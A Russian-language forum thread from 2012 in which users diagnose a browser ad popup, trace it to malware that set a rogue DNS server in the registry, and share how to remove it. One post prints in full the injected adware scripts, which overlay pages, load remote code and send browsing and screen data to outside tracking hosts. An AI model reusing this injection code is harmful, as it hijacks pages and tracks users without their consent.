Такая же проблема... уже замучился... ни один антивирусник не ищет...

выскакивает тот баннер что написал ТС и еще "Бесплатное тестирование от сайта хххх"

кстати в опере тоже выскакивает...

не находит.... все напрасно

archie > 20-12-2012 06:44:37

Всем привет, немного разобрался в ситуации.

1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.

3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу  mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.

На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.

У кого какие мысли по этому поводу?


  Watch.js

скрытый текст
function f_filterResults(n_win, n_docel, n_body) {
    var n_result = n_win ? n_win : 0;
    if (n_docel && (!n_result || (n_result > n_docel)))
        n_result = n_docel;
    return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result;
}

function f_clientWidth() {
    return f_filterResults (
        window.innerWidth ? window.innerWidth : 0,
        document.documentElement ? document.documentElement.clientWidth : 0,
        document.body ? document.body.clientWidth : 0
    );
}
function f_clientHeight() {
    return f_filterResults (
        window.innerHeight ? window.innerHeight : 0,
        document.documentElement ? document.documentElement.clientHeight : 0,
        document.body ? document.body.clientHeight : 0
    );
}
function f_scrollLeft() {
    return f_filterResults (
        window.pageXOffset ? window.pageXOffset : 0,
        document.documentElement ? document.documentElement.scrollLeft : 0,
        document.body ? document.body.scrollLeft : 0
    );
}
function f_scrollTop() {
    return f_filterResults (
        window.pageYOffset ? window.pageYOffset : 0,
        document.documentElement ? document.documentElement.scrollTop : 0,
        document.body ? document.body.scrollTop : 0
    );
}

function popMove()
{
    popDiv = document.getElementById("popDiv");
    if(popDiv != null)
    {
        popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
        popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
    }
}

function popHide()
{
    popDiv = document.getElementById("popDiv");
    clearInterval(popMoveRun);
    popDiv.style.display = 'none';
    return false;
}

function popShowClose()
{
    popControl = document.getElementById("popControl");
    popControl.style.display = 'block';
}

if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
    var popMutex = true;
   
    var popDiv = document.createElement("div");
    popDiv.id = "popDiv";
    popDiv.style.position = "absolute";
    popDiv.style.width = "850px";
    popDiv.style.height = "550px";
    popDiv.style.backgroundColor = "white";
    popDiv.style.zIndex = "1000";
    popDiv.onclick = popShowClose;
    document.body.appendChild(popDiv);
   
    var advName = "DataMind";
    var popInfo = document.createElement("div");
    popInfo.id = "popInfo";
    popInfo.style.position = "absolute";
    popInfo.style.left = "10px";
    popInfo.style.fontSize = "11px";
    popInfo.style.fontWeight = "bold";
    popInfo.style.padding = "0 1px 25px";
    popInfo.style.height = "13px";
    popInfo.style.color = "black";
    popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
    popInfo.style.display = "block";
    popInfo.innerHTML = "&#1056;&#1077;&#1082;&#1083;&#1072;&#1084;&#1072; &#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1099; " + advName + " <font color=\"red\">&#1055;&#1086;&#1089;&#1077;&#1090;&#1080;&#1090;&#1077; &#1089;&#1072;&#1081;&#1090; &#1089;&#1087;&#1086;&#1085;&#1089;&#1086;&#1088;&#1072; &#1095;&#1090;&#1086;&#1073;&#1099; &#1087;&#1088;&#1086;&#1076;&#1086;&#1083;&#1078;&#1080;&#1090;&#1100; &#1087;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1072;&#1081;&#1090;&#1072;</font>";
    popDiv.appendChild(popInfo);
   
    var popControl = document.createElement("div");
    popControl.id = "popControl";
    popControl.style.position = "absolute";
    popControl.style.right = "10px";
    popControl.style.display = 'none';
    popDiv.appendChild(popControl);
   
    var popControlClose = document.createElement("a");
    popControlClose.href = "#";
    popControlClose.onclick = popHide;
    popControlClose.style.fontSize = "11px";
    popControlClose.style.fontWeight = "bold";
    popControlClose.style.padding = "0 1px 25px";
    popControlClose.style.color = "#096";
    popControlClose.style.height = "13px";
    popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
    popControlClose.style.display = "block";
    popControlClose.innerHTML = "&#1047;&#1072;&#1082;&#1088;&#1099;&#1090;&#1100;";
    popControl.appendChild(popControlClose);
   
    var adDiv = document.createElement("div");
    adDiv.id = "lx_381874";
    adDiv.style.position = "absolute";
    adDiv.style.top = "15px";
    popDiv.appendChild(adDiv);
   
   
    var adScript = document.createElement("script");
    adScript.type = "text/javascript";
    adScript.language="JavaScript";
    adScript.charset = "utf-8";
    adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
    document.body.appendChild(adScript);
   
    var popMoveRun = setInterval (popMove, 10);
    setTimeout(popShowClose, 10000);
}


lb123811.js
скрытый текст
(function(){var j=!0,l=null,z=!1;function A(){return function(){}}function e(a){return parseInt(a,10)}function oa(){return 100*((new Date).getTime()%1E7)+Math.round(99*Math.random())}function g(a){return"undefined"!=typeof a}function H(a,b){b||(b=A());var c=n.createElement("script");c.setAttribute(pa,qa);c.setAttribute("src",a);if(g(c))w?c.onreadystatechange=function(){("loaded"==this.readyState||"complete"==this.readyState)&&setTimeout(b,0)}:c.onload=function(){setTimeout(b,0)},N.appendChild(c)}function O(a){var b=n.createElement("style");b.setAttribute("rel",
"stylesheet");b.setAttribute(pa,"text/css");N.appendChild(b);w?b.styleSheet.cssText=a:b.appendChild(n.createTextNode(a))}function ra(){var a=z,b=navigator,c=l;if(g(b.plugins)&&"object"==typeof b.plugins["Shockwave Flash"]){if((c=b.plugins["Shockwave Flash"].description)&&(!g(b.mimeTypes)||!b.mimeTypes["application/x-shockwave-flash"]||b.mimeTypes["application/x-shockwave-flash"].enabledPlugin))c=c.replace(/^.*\s+(\S+\s+\S+$)/,"$1"),a=[0,0,0],a[0]=e(c.replace(/^(.*)\..*$/,"$1")),a[1]=e(c.replace(/^.*\.(.*)\s.*$/,
"$1")),a[2]=/[a-zA-Z]/.test(c)?e(c.replace(/^.*[a-zA-Z]+(.*)$/,"$1")):0}else if(g(f.ActiveXObject))try{var d=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if(d&&(c=d.GetVariable("$version")))c=c.split(" ")[1].split(","),a=[e(c[0]),e(c[1]),e(c[2])]}catch(m){}return a=a!==z?a.join("."):a}function Qa(){var a=ra(),b="10.0.42".split(".");if(a===z)return z;a=a.split(".");b[0]=parseInt(b[0],10);b[1]=parseInt(b[1],10)||0;b[2]=parseInt(b[2],10)||0;return a[0]>b[0]||a[0]==b[0]&&a[1]>b[1]||a[0]==b[0]&&
a[1]==b[1]&&a[2]>=b[2]?a.join("."):z}function D(a,b,c){a.addEventListener?a.addEventListener(b,c,z):a.attachEvent("on"+b,c)}function Ra(a,b){a.innerHTML=b;for(var c=[],d=a.childNodes,m=0;d[m];m++)c&&d[m].nodeName&&"script"===d[m].nodeName.toLocaleLowerCase()&&(!d[m].type||"text/javascript"===d[m].type.toLowerCase())&&c.push(d[m].parentNode?d[m].parentNode.removeChild(d[m]):d[m]);for(var e in c){var d=c[e],m=d.text||d.textContent||d.innerHTML||"",f=n.createElement("script");f.type="text/javascript";
f.appendChild(n.createTextNode(m));N.insertBefore(f,N.firstChild);N.removeChild(f);d.parentNode&&d.parentNode.removeChild(d)}}function aa(){var a="",a="?rt="+oa();n.referrer&&(a+="&r="+escape(n.referrer));P&&(a+="&recurring=1");ba&&(a+="&flash="+escape(ba));w&&(a+="&isie=1");if(!f[h].popunderShow)for(var b in i)if(i.hasOwnProperty(b)&&"object"==typeof i[b]&&g(i[b].type)&&"popunder"==i[b].type){a+="&pu=1";break}a+="&f="+h;g(screen.width)&&(a+="&scr="+escape(screen.width+"x"+screen.height));return a+=
f[h].multishowsAdd?"&"+f[h].multishowsAdd:""}function Sa(a){for(var b=a.length,c=[],d=0;d<b;d++)c.push(a[d].l+";"+a[d].n.join(";"));ca&&H(ca+"?"+c.join("&"),A())}function Ta(){I&&(clearTimeout(I),I=l);for(var a=E.length,b=[],c=0;c<a;c++)if(E[c]){var d;a:{var m=E[c];if(m){var e=getElementsByClass("lx__tsb",m);d=[];for(var g=[],k=void 0,i=e.length,k=0;k<i;k++){var h;if(h=e[k])b:{h=e[k];if(!(0===h.offsetWidth||0===h.offsetHeight))for(var q=C&&!f.opera?s.clientHeight:u.clientHeight,o=C&&!f.opera?s.clientWidth:
u.clientWidth,r=h.getClientRects(),v=0,w=r.length;v<w;v++){var p=r[v],t=0<=p.left&&p.left+(p.width?p.width:p.right-p.left)<o,x;if(x=0<=p.top&&p.top+(p.height?p.height:p.bottom-p.top)<q){if(t){p=n.elementFromPoint((p.left+p.right)/2,(p.top+p.bottom)/2);if(p===h)p=j;else c:{if(p)for(p=p.parentNode;p!=l;){if(p==h){p=j;break c}p=p.parentNode}p=z}t=p}x=t}if(x){h=j;break b}}h=z}h&&(d.push(e[k].getAttribute("tsbid")),g.push(e[k]))}e=g.length;for(k=0;k<e;k++)h=g[k],h.className=h.className.replace(RegExp("(^|\\s)lx__tsb(\\s|$)",
"g"),"$1").replace(/\s+/g," ").replace(/(^ | $)/g,"");if(g=d.length){m=getElementsByClass("lx__tsbc",m);m=m[0];m=m.getAttribute("tsbc");d={n:d,all:i==g,l:m};break a}}d=z}if(d!==z){d.all&&delete E[c];i=d.n;m=[];g=0;k=i.length;a:for(;g<k;g++){e=0;for(h=m.length;e<h;e++)if(m[e]==i[g])continue a;m[m.length]=i[g]}b.push({n:m,l:d.l})}}b.length&&Sa(b)}function da(){I&&clearTimeout(I);I=setTimeout(Ta,1E3)}function sa(){t.demogr&&t.interests&&!t.sent&&H("http://"+S+"/set_li_stat/?sex="+t.sex+"&lage="+t.lage+
"&uage="+t.uage+"&interest="+t.interest,function(){t.sent=j})}function x(a,b){o.style[a]=b}function Ua(){f[b].bottomReady=function(a){a=e(a);o.childNodes[1].height=a+q;x("height",a+5+q)}}function ea(a){var b=a.toString(),b=b.substr(9),b=b.substr(0,b.indexOf("("));g(J[b])?(clearTimeout(J[b]),J[b]=setTimeout(function(){clearInterval(J[b]);a();delete J.C},ta)):(J[b]=setInterval(function(){a()},ta),a())}function ua(){ea(va)}function wa(){ea(T);w&&(ea(xa),setTimeout(T,250))}function xa(){x("width",s.clientWidth?
s.clientWidth:u.clientWidth)}function va(){fa(K,{bottom:j,right:j})}function T(){fa(o,{bottom:j})}function fa(a,b){var c=a.style;if(g(b[v])&&b[v]&&!g(a.d))a.d=e(a.currentStyle[v]),g(b[v])&&b[v]&&(c[v]=U);if(g(b.right)&&b.right&&!g(a.q)&&(a.q=e(a.currentStyle.right),g(b.right)&&b.right))c.right="";if(g(b.left)&&b.left&&!g(a.u))a.u=e(a.currentStyle.left);if(g(b[v])&&b[v])c.position=L,c.top=w?0-a.d-(e(c.height)?e(c.height):a.offsetHeight)+(s.clientHeight?s.clientHeight:u.clientHeight)+e(C&&!f.opera?
s.scrollTop:u.scrollTop)+q:0-a.d-e(c.height)+e(f.innerHeight)+e(f.pageYOffset)+q;if(g(b.right)&&b.right)c.position=L,C?c.right=a.q-(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q:c.left=0-a.q-(e(c.width)?e(c.width):a.offsetWidth)+(s.clientWidth?s.clientWidth:u.clientWidth)+(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q;if(g(b.left)&&b.left)c.position=L,c.left=a.u+e(C&&!f.opera?s.scrollLeft:u.scrollLeft)+q}function ya(){var a=n.getElementsByTagName("object"),b=n.getElementsByTagName("embed"),c={m:z,w:[],embeds:[]};
if(V)for(var d=0;d<a.length;d++){for(var e=z,f=a[d].getElementsByTagName("param"),h=0;h<f.length;h++)if("wmode"==f[h].getAttribute("name").toLowerCase()){e=j;break}if(e)c.m=j,c.w.push(a[d])}for(d=0;d<b.length;d++){a=b[d].getAttribute("wmode");if(!(e=!a))g(a)?(a=a.toLowerCase(),a="transparent"!=a&&"opaque"!=a?z:j):a=z,e=!a;if(e)c.m=j,c.embeds.push(b[d])}return c}function Va(){for(var a=ya(),b=a.w,a=a.embeds,c=0;c<b.length;c++){var d=n.createElement("param");d.setAttribute("name","wmode");d.setAttribute("value",
"transparent");b[c].appendChild(d);b[c].outerHTML=b[c].outerHTML}for(c=0;c<a.length;c++)a[c].setAttribute("wmode","transparent"),a[c].outerHTML=a[c].outerHTML}function Q(a){var b=a.which?a.which:a.button,a=(w?a.srcElement:a.target).nodeName.toLowerCase();if(("a"==a||"img"==a)&&2!=b&&3!=b)clearTimeout(ga),ga=setTimeout(function(){ga=l;za()},500)}function Wa(){var a="";if(F)for(var b in i)i.hasOwnProperty(b)&&"object"==typeof i[b]&&(a+=escape(b.substr(1))+";");0<a.length&&(a=a.substring(0,a.length-
1));return a}function Aa(a){Ba(a.target?a.target:a.srcElement)}function Xa(a){var b=/\/i\/(a??)(\d+?)\//m,c=b.exec(a),d=z;if(c!=l&&16!=c){d=e(c[2]);d=(2*(10*d+40)-40)/10;16<=d&&(d=16);var f=10*d+40,d=a.replace(b,"/i/$1"+d+"/")}return{url:d,size:f}}function Ca(a){var b=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollTop:u.scrollTop),c=e(b+(C&&!f.opera?s.clientHeight:u.clientHeight)),d=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollLeft:u.scrollLeft),g=e(d+(C&&!f.opera?s.clientWidth:u.clientWidth)),
h=a.getClientRects()[0],i=Math.round(h.top)+b,k=Math.round(h.bottom)+b,o=Math.round(h.left)+d,h=Math.round(h.right)+d;if(i<b)a.style.top=e(a.style.top)+(b-i)+W+q;if(k>c)a.style.top=e(a.style.top)-(k-c)-W+q;if(o<d)a.style.left=e(a.style.left)+(d-o)+W+q;if(h>g)a.style.left=e(a.style.left)-(h-g)-W+q}function ha(a,b){clearTimeout(a.getAttribute("enlargeTimer"));var c=Da(b),d=e(a.height)-y;a.width=e(a.width)-y;a.height=d;d=e(c.left)>e(a.style.left)?e(a.style.left)+y/2:e(a.style.left)-y/2;a.style.top=(e(c.top)>
e(a.style.top)?e(a.style.top)+y/2:e(a.style.top)-y/2)+q;a.style.left=d+q;e(a.width)>e(b.width)?a.setAttribute("shrinkTimer",setTimeout(function(){ha(a,b)},R)):(a.style.top="-100000px",a.style.left="-100000px",b.style.visibility="",b.parentNode.style.zIndex="")}function Ea(a,b){clearTimeout(a.getAttribute("shrinkTimer"));var c=e(a.height)+y;a.width=e(a.width)+y;a.height=c;c=e(a.style.left)-y/2;a.style.top=e(a.style.top)-y/2+q;a.style.left=c+q;Ca(a);e(a.width)<b&&a.setAttribute("enlargeTimer",setTimeout(function(){Ea(a,
b)},R))}function Da(a){for(var b=0,c=0;a&&"relative"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position&&"absolute"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position;)b+=e(a.offsetTop),c+=e(a.offsetLeft),a=a.offsetParent;return{top:b,left:c}}function Ba(a){var b,c=Da(a),d=Xa(a.src),e=d.size;if((d=d.url)||d!=a.src){a.previousSibling&&"img"==a.previousSibling.nodeName.toLowerCase()?b=a.previousSibling:(b=a.cloneNode(z),w&&b.detachEvent("onmouseover",Aa),b.style.position=L,b.style.top=
"-100000px",b.style.left="-100000px",b.style.margin="0px",n.addEventListener?b.addEventListener("mouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))},z):b.attachEvent("onmouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))}),a.parentNode.insertBefore(b,a));if(b.src==a.src){var f=b.cloneNode(z);D(f,"load",function(){b.src=f.src;setTimeout(function(){f.parentNode.removeChild(f)},
100)});f.src=d;b.parentNode.insertBefore(f,b)}b.width=a.width;b.height=a.height;b.style.top=c.top+q;b.style.left=c.left+q;a.style.visibility="hidden";a.parentNode.style.zIndex=1E5;Ca(b);b.setAttribute("enlargeTimer",setTimeout(function(){Ea(b,e)},R))}}function Ya(a,b){b&&(D(n,ia,Fa(a)),X&&(Y(a)(),D(f,"resize",Ga(a)),D(f,ia,Ga(a))));for(var c=getElementsByClass("close",a.a),d=c.length,e=0;e<d;e++)D(c[e],ja,Za(a));c=getElementsByClass("ref",a.a);d=c.length;for(e=0;e<d;e++)D(c[e],ja,Ha(a))}function Za(a){return function(b){if(b||
f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;a.s=j;ka(a);b=new Date;b.setTime(b.getTime()+36E5*$a);n.cookie="_lxretpopupignore=1; path=/; expires="+b.toUTCString()}}function Ha(a){return function(b){if(b||f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;clearTimeout(a.i);a.j=j;ka(a,function(){H(la+a.B+"/"+aa(),A())})}}function Fa(a){return function(){if(!a.s&&!a.j){var b=e(s.scrollTop?s.scrollTop:u.scrollTop);!a.k&&b>=a.v?ab(a):a.k&&b<a.v&&
ka(a)}}}function Y(a){return function(){a.a[a.b+"Offset"]=e(a.a.style[a.b]);var b={bottom:j};a.b==Ia&&(b[Ia]=j);a.b==Ja&&(b[Ja]=j);fa(a.a,b)}}function Ga(a){return function(){g(a.t)&&clearTimeout(a.t);a.t=setTimeout(Y(a),100)}}function Ka(a){var b=0;return b=X?a.a[a.b+"Offset"]:e(a.a.style[a.b])}function ab(a){a.k=j;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.i=setTimeout(Ha(a),1E3*a.refresh);a.a.style.display="block";a.c=setInterval(function(){var b=Ka(a),c=b+La;0>b&&0>c?(a.h=j,a.a.style[a.b]=
c+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=0+q);X&&Y(a)()},Ma)}function ka(a,b){a.k=z;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.c=setInterval(function(){var c=Ka(a),d=c-La;c>=-a.width&&d>-a.width?(a.h=j,a.a.style[a.b]=d+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=-a.width+q,a.a.style.display="none",g(b)&&b());X&&Y(a)()},Ma)}function za(a){if(!Z){Z=j;var b=Wa();b&&(a?(n.write('<scr'+'ipt type="'+qa+'" language="JavaScr'+'ipt" src="'+la+b+"/"+aa()+'"><\/scr'+'ipt>'),Z=z):H(la+b+"/"+aa(),function(){Z=
z}))}}var i={"_336612":{id:"lx_336612"},"_381874":{id:"lx_381874",A:!0}},h="__lxG123811__",B="__lxG__",G={},n=document,f=window,u=n.body,s=n.documentElement,N=function(){var a=n.getElementsByTagName("head")[0];if(a)return a;for(a=s.firstChild;a&&"#text"==a.nodeName.toLowerCase();)a=a.nextSibling;if(a&&"#text"!=a.nodeName.toLowerCase())return a;a=n.createElement("head");
s.appendChild(a);return a}(),$=navigator.userAgent.toLowerCase(),w=/msie/.test($)&&!/opera/.test($),bb=(navigator.userAgent.toLowerCase().match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[])[1],C="CSS1Compat"===n.compatMode,ma=/chrome/.test($),V=/opera/.test($),P=z,Z=z,ga=l,F=0,E=[],I=l,ba=ma?Qa():ra(),Na=z,K=l,o=l,ta=50,na=l,Oa=z,v="bottom",q="px",L="absolute",r={},qa="text/javascript",pa="type",U="auto",M="",Pa=z,ca="",W=3,y=10,R=10,Ja="right",Ia="left",ia="scroll",ja="click",$a=480,Ma=15,La=22,X=w&&(!C||
8>e(bb)&&C),S="luxup.ru",la="http://"+S+"/multishows/",J={},t={demogr:z,interests:z,sent:z};getElementsByClass=n.getElementsByClassName?function(a,b){return(b||document).getElementsByClassName(a)}:function(a,b){var c=(b||document).getElementsByTagName("*"),d=c.length,e=a.split(/\s+/),f=e.length,h=[],g,i;for(g=0;g<d;g++)for(i=0;i<f;i++)if(-1!=c[g].className.search("\\b"+e[i]+"\\b")){h.push(c[g]);break}return h};D(f,ia,da);G[h]={};G[h].g=function(){if(!M)return j;M+="?rnd="+oa()+(f[h].popunderAdd?"&"+
f[h].popunderAdd:"");var a=window;window.open(M,h+"popunder","toolbar=1,location=1,status=1, menubar=1,scrollbars=1,resizable=1");M="";a.focus();u.detachEvent?(u.detachEvent("onclick",G[h].g),u.releaseCapture()):(u.removeEventListener("click",G[h].g,j),u.removeEventListener("click",G[h].g));return j};g(f[h])||(f[h]={});g(f[b])||(f[b]={});f[h].closed=A();f[h].clicked=A();if(!g(f[h].popunderShow))f[h].popunderShow=z;if(!g(f[h].allLoaded))f[h].allLoaded=A();if(!g(f[h].popunderAdd))f[h].popunderAdd="";
if(!g(f[h].multishowsAdd))f[h].multishowsAdd="";f[b].demogr=function(a){t.sex=encodeURIComponent(a.gen);t.lage=encodeURIComponent(a.lage);t.uage=encodeURIComponent(a.uage);t.demogr=j;sa()};f[b].interests=function(a){t.interest=encodeURIComponent(a.hier_inter.join(","));t.interests=j;sa()};f[h].parser=function(a){E=[];for(var b in a)if(a.hasOwnProperty(b)){var c=a[b];if("cfg"==c.type)c.hasOwnProperty("realShowsUrl")&&(ca=c.realShowsUrl),c.hasOwnProperty("getLiData")&&setTimeout(function(){H("http://medianet.yadro.ru/hier_inter.txt",
A());H("http://medianet.yadro.ru/info.txt",A())},0);else if("counters"==c.type){if(c.hasOwnProperty("urls"))for(var d=0;d<c.urls.length;d++)(new Image).src=c.urls[d]}else if(g(i["_"+c.id])&&g(c.source)&&c.source){if((d=n.getElementById(i["_"+c.id].id))&&"html"==c.type)if(P||(O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),d.innerHTML=c.source,i["_"+c.id].f=j,getElementsByClass("lx__tsbc",d).length&&E.push(d),g(i["_"+c.id].A)&&i["_"+c.id].A)for(var m=d.getElementsByTagName("img"),
s=m.length,t=0;t<s;t++)n.addEventListener?m[t].addEventListener("mouseover",function(){Ba(this)},z):m[t].attachEvent("onmouseover",Aa);if(d&&"pu"==c.type&&!Pa)M="http://c."+S+"/pu/"+c.id+".html",n.addEventListener?u.addEventListener("click",G[h].g,j):(u.attachEvent("onclick",G[h].g),u.setCapture(j)),Pa=i["_"+c.id].f=j;if(d&&"js"==c.type)P||(g(c.style)&&O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),Ra(d,c.source),i["_"+c.id].f=j;if(d&&"flash"==c.type&&!Na)K=
d,O(c.style),f[h].closed=function(){K.parentNode.removeChild(K)},f[h].clicked=function(){K.parentNode.removeChild(K)},d.innerHTML=c.source,i["_"+c.id].f=j,w&&(f.attachEvent("onscroll",ua),f.attachEvent("onresize",ua),va()),Na=j,getElementsByClass("lx__tsbc",d).length&&E.push(d);if(d&&c.type==v)o=d,(V||ma)&&Oa&&g(i["_"+c.id].z)&&i["_"+c.id].z&&Va(),""!=c.style&&O(c.style),w?o.e=e(o.currentStyle[v]):(o.e=e(n.defaultView.getComputedStyle(o,l).bottom),V&&(o.e-=1)),f[b].bottomClosed=function(){var a=n.createElement("a");
a.innerHTML=".";a.href="medianet.adlabs.ru";o.appendChild(a);a.focus();a.blur();o.style.display="none";da()},x("position",L),x(v,U),x("top","-100000px"),x("zIndex",99999),f[b].bottomReady=function(a,b){a=e(a);if(150<a)return z;o.childNodes[1].height=a+q;x(v,"-"+(a+5+10)+q);x("top","");w?x("position",L):x("position","fixed");if(w){if(0!=b)xa(),clearInterval(na),f[b].bottomReady=A()}else f[b].bottomReady=A();na=setInterval(function(){var a=w&&g(o.d)?o.d:e(o.style[v]);if(a<o.e&&!(6.25>o.e-a)){if(x(v,
a+5+q),w)o.d=a+5,x(v,U),T()}else{clearInterval(na);x(v,o.e+q);if(w)o.d=o.e,x(v,U),T(),f.attachEvent("onscroll",wa),f.attachEvent("onresize",wa);setTimeout(Ua,100)}},25)},o.innerHTML=c.source,ba||setTimeout(function(){var a=0,a=w?o.offsetHeight:n.defaultView.getComputedStyle(o,l).height;f[b].bottomReady(e(a)-5,1)},250),i["_"+c.id].f=j;if(d&&"float"==c.type){m=z;P||(O(c.style),D(d,ja,Q));if(!g(r[k])){var k=c.id;r[k]=i["_"+k];r[k].B=k;r[k].a=d;r[k].k=z;r[k].s=z;r[k].h=z;r[k].i=0;r[k].j=z;m=j}r[k].a.innerHTML=
c.source;r[k].a.style[r[k].b]=-1E3+q;r[k].a.style.display="block";r[k].width=e(r[k].a.width?r[k].a.width:r[k].a.offsetWidth);r[k].a.style[r[k].b]=-r[k].width+q;Ya(r[k],m);if(r[k].j)r[k].j=z;Fa(r[k])();i["_"+c.id].f=j;getElementsByClass("retail__tsbc",d).length&&E.push(d)}}}for(var y in i)i.hasOwnProperty(y)&&!g(i[y].f)&&g(i[y].r)&&i[y].r();P=z;setTimeout(function(){f[h].allLoaded()},0);da()};(function(){for(var a in i)if(i.hasOwnProperty(a)&&"object"==typeof i[a]){var b=n.getElementById(i[a].id),
c=z;g(i[a].type)&&"float"==i[a].type&&-1!=n.cookie.indexOf("_lxretpopupignore=1")&&(c=j);if(!b||c)delete i[a];else if((V||ma)&&g(i[a].type)&&"bottom"==i[a].type)if(ya().m){if(Oa=j,!g(i[a].o)||g(i[a].o)&&!i[a].o)F+=1}else F+=1;else F+=1}})();(new Image).src="http://counter.yadro.ru/hit;Luxup?r"+escape(n.referrer)+("undefined"==typeof screen?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(n.URL)+";"+Math.random();(new Image).src="http://"+S+"/merge_gpsid/?t="+(new Date).getTime();za(0)})();

gjurza > 20-12-2012 13:00:57

archie

Вот http://virusinfo.info/showthread.php?t=129046 должны решить со дня на день....

lsn > 20-12-2012 14:29:11

Тоже самое!
На всех браузерах при открытии любого сайта "Реклама системы DataMind Посетите сайт спонсора чтобы продолжить просмотр сайта"
Не какие антивирусы не помогают.
Что делать куда копать?

20-12-2012 14:33:00
Если в браузере отключаешь javascript то всплывающее окно пропадает

lsn > 20-12-2012 15:03:38

Да уже все перепробовал, не помогает не чего.:(

stealthm > 20-12-2012 20:58:34

Я решил такую же проблему! Сам попался. Вирус просто тупо меняет адрес DNS сервера в свойствах сетевого подключения на свой, фальшивый. Соответственно, никакая антивирусная программа этого не обнаруживает.

lsn > 20-12-2012 21:25:02

Что за вирус?

gjurza > 21-12-2012 02:15:41
stealthm пишет

Я решил такую же проблему! Сам попался. Вирус просто тупо меняет адрес DNS сервера в свойствах сетевого подключения на свой, фальшивый. Соответственно, никакая антивирусная программа этого не обнаруживает.

Да действительно, вы правы - зашел в настройки ТСП ИП и нашел там ложный ДНС... еще советую в регистре найти этот ключик и удалить: O17 - HKLM\System\CCS\Services\Tcpip\..\{F89B57C1-93A9-4205-8E74-88ECC3D07C69}: NameServer = 5.199.140.180

archie > 21-12-2012 05:22:19

Все верно, в реестре в ключе HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\{abbracaddabra}: NameServer стоял адрес 5.199.140.180.
Но вопрос остается - КТО ЭТО СДЕЛАЛ ???

tetiana > 21-12-2012 15:00:12
archie пишет

Но вопрос остается - КТО ЭТО СДЕЛАЛ ???

Я точно знаю, кто это сделал: radikal.ru
Может, кто-то еще делает, но у меня без вариантов, загружала фотку и уже тогда у меня возникли подозрения, а после рестарта оперы началось...

У меня еще во всех браузерах стартовая поменялась на http://mailrusearchgo.ru

archie > 21-12-2012 16:10:13

Я имел в виду, что за программа сделала запись в реестр и как она вообще ко мне попала ? А то получается без меня меня женили, а я вроде как вообще не при делах :)

P.S. А на варезники я вообще никогда не захожу.

feas > 21-12-2012 16:31:59

Радикал? Хм... Я вроде ему доверяю. Вы смотрите, если ДНС не тот - откроется что угодно.

tetiana > 21-12-2012 16:48:04
archie пишет

А на варезники я вообще никогда не захожу.

Это не варезник, это фотохостинг и "программа" пришла именно оттуда.

feas пишет

Радикал? Хм... Я вроде ему доверяю.

Я тоже ему доверяла, хотя каспер и предупреждал, но думала, что каспер и опера его блокируют из-за чрезмерной рекламы. Но это радикал без вариантов, потому что это единственный сайт, который я посетила перед заражением и  вообще единственное действие с моей стороны перед заражением.

voqabuhe > 21-12-2012 17:49:49
tetiana пишет

Я точно знаю, кто это сделал: radikal.ru

Бред какой-то нет ничего на радикале, тебе показалось. :dumb:

archie > 21-12-2012 17:50:29

Это не варезник, это фотохостинг

Там рекламных скриптов больше, чем на варезниках. Такие сайты стараюсь обходить десятой дорогой.

Соломон Израилевич > 21-12-2012 18:37:31

Спасибо за то, что вы есть!
Дня четыре назад жена минут 30 посидела за компом, а я таки до сегодняшнего дня искал в инете решение проблемы! Не знаю уж, куда она тыкала мышкой, но результат был очень раздражителен! :)
В общем, сначала симптомы проявились в мозилле, а уж потом и в експлорере. сегодня, благодаря Вам, определил:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: NameServer стоял адрес 5.199.140.180.
В настройках адаптера стоял тот же ip-адрес

tetiana > 21-12-2012 22:00:39
voqabuhe пишет

